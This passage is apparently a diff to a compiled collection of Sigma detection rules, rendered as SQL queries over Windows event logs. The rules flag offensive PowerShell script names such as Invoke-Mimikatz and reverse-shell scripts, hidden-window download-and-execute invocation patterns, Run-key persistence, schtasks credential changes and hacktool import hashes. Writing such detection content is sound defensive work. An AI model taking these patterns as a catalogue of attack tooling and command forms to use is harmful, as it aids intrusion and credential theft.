'%Get-GPPPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-IndexedItem.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Keystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-LSASecret.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-MicrophoneAudio.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHashes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-PassHints.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAlwaysInstallElevated.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RegAutoLogon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-RickAstley.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Screenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SecurityPackages.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceFilePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServicePermission.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-ServiceUnquoted.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-SiteListPassword.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-System.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-TimedScreenshot.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-UnattendedInstallFile.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-Unconstrained.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-USBKeystrokes.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VaultCredential.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnAutoRun.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-VulnSchTask.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebConfig.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WebCredentials.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Get-WLAN-Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Gupt-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%HTTP-Login.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-ServiceBinary.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Install-SSP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ACLScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ADSBackdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-AmsiBypass.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ARPScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BackdoorLNK.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BadPotato.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BetterSafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BruteForce.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-BypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Carbuncle.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Certify.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ConPtyShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-CredentialsPhish.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DAFT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DCSync.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Decode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DinvokeKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DllInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-DowngradeAccount.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EgressCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Encode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-EventViewer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Eyewitness.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-FakeLogonScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Farmer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Get-RBCD-Threaded.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Gopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper2.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Grouper3.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-HandleKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Interceptor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Internalmonologue.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Inveigh.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-InveighRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRegsvr.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-JSRatRundll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-KrbRelayUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-LdapSignCheck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Lockless.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MalSCCM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MimikatzWDigestDowngrade.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Mimikittenz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-MITM6.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NanoDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetRipper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NetworkRelay.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-NinjaCopy.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-OxidResolver.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-P0wnedshellx86.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Paranoia.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PortScan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PoshRatHttps.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PostExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellIcmp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTCP.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellTcpOneLineBind.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellUdpOneLine.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerShellWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PowerThIEf.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PPLDump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Prasadhak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsGcatAgent.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PSInject.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-PsUaCme.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReflectivePEInjection.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ReverseDNSLookup.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Rubeus.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-RunAs.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SafetyKatz.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SauronEye.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SCShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Seatbelt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ServiceAbuse.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SessionGopher.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ShellCode.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SMBScanner.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Snaffler.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Spoolsample.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSHCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-SSIDExfil.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StandIn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-StickyNotesExtract.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tater.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Thunderfox.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-ThunderStruck.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TokenManipulation.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Tokenvator.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-TotalExec.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UrbanBishop.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-UserHunter.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-VoiceTroll.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Whisker.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WinEnum.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-winPEAS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WireTap.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WmiCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-WScriptBypassUAC.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Invoke-Zerologon.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Keylogger.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%MailRaider.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%New-HoneyHash.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%OfficeMemScraper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Offline\\_Winpwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-CHM.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-DnsTxt.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Excel.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-HTA.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Java.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-JS.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Minidump.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-RundllCommand.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCF.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-SCT.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Shortcut.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-WebQuery.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Out-Word.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Parse\\_Keys.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Port-Scan.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerBreach.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%powercat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerRunAsSystem.psm1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerSharpPack.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUp.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerUpSQL.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PowerView.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%PSAsyncShell.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%RemoteHashRetrieval.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Persistence.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-PoshRat.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Remove-Update.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Run-EXEonRemote.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Schtasks-Backdoor.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-DCShadowPermissions.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-MacAttribute.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemotePSRemoting.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-RemoteWMI.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Set-Wallpaper.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Show-TargetScreen.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Speak.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-CaptureServer.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Start-WebcamRecorder.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%StringToBase64.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%TexttoExe.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%VolumeShadowCopyTools.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WinPwn.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%WSUSpendu.ps1%' ESCAPE '\\') OR (ContextInfo LIKE '%Invoke-Sharp%' ESCAPE '\\' AND ContextInfo LIKE '%.ps1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" ], - "filename": "posh_pm_exploit_scripts.yml" + "filename": "proc_creation_win_exploit_other_bearlpe.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - PowerShell Module", - "id": "8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090", + "title": "Suspicious Hacktool Execution - Imphash", + "id": "24e3e58a-646b-4b50-adef-02ef935b9fc8", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Unknown" + "Legitimate use of one of these tools" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-noni%' ESCAPE '\\' AND ContextInfo LIKE '%-nop%' ESCAPE '\\' AND ContextInfo LIKE '% -c %' ESCAPE '\\' AND ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\') OR (ContextInfo LIKE '% -w %' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%-ep%' ESCAPE '\\' AND ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-Enc%' ESCAPE '\\') OR (ContextInfo LIKE '%powershell%' ESCAPE '\\' AND ContextInfo LIKE '%reg%' ESCAPE '\\' AND ContextInfo LIKE '%add%' ESCAPE '\\' AND ContextInfo LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ContextInfo LIKE '%bypass%' ESCAPE '\\' AND ContextInfo LIKE '%-noprofile%' ESCAPE '\\' AND ContextInfo LIKE '%-windowstyle%' ESCAPE '\\' AND ContextInfo LIKE '%hidden%' ESCAPE '\\' AND ContextInfo LIKE '%new-object%' ESCAPE '\\' AND ContextInfo LIKE '%system.net.webclient%' ESCAPE '\\' AND ContextInfo LIKE '%.download%' ESCAPE '\\') OR (ContextInfo LIKE '%iex%' ESCAPE '\\' AND ContextInfo LIKE '%New-Object%' ESCAPE '\\' AND ContextInfo LIKE '%Net.WebClient%' ESCAPE '\\' AND ContextInfo LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ContextInfo LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ContextInfo LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b') OR (Hashes LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' 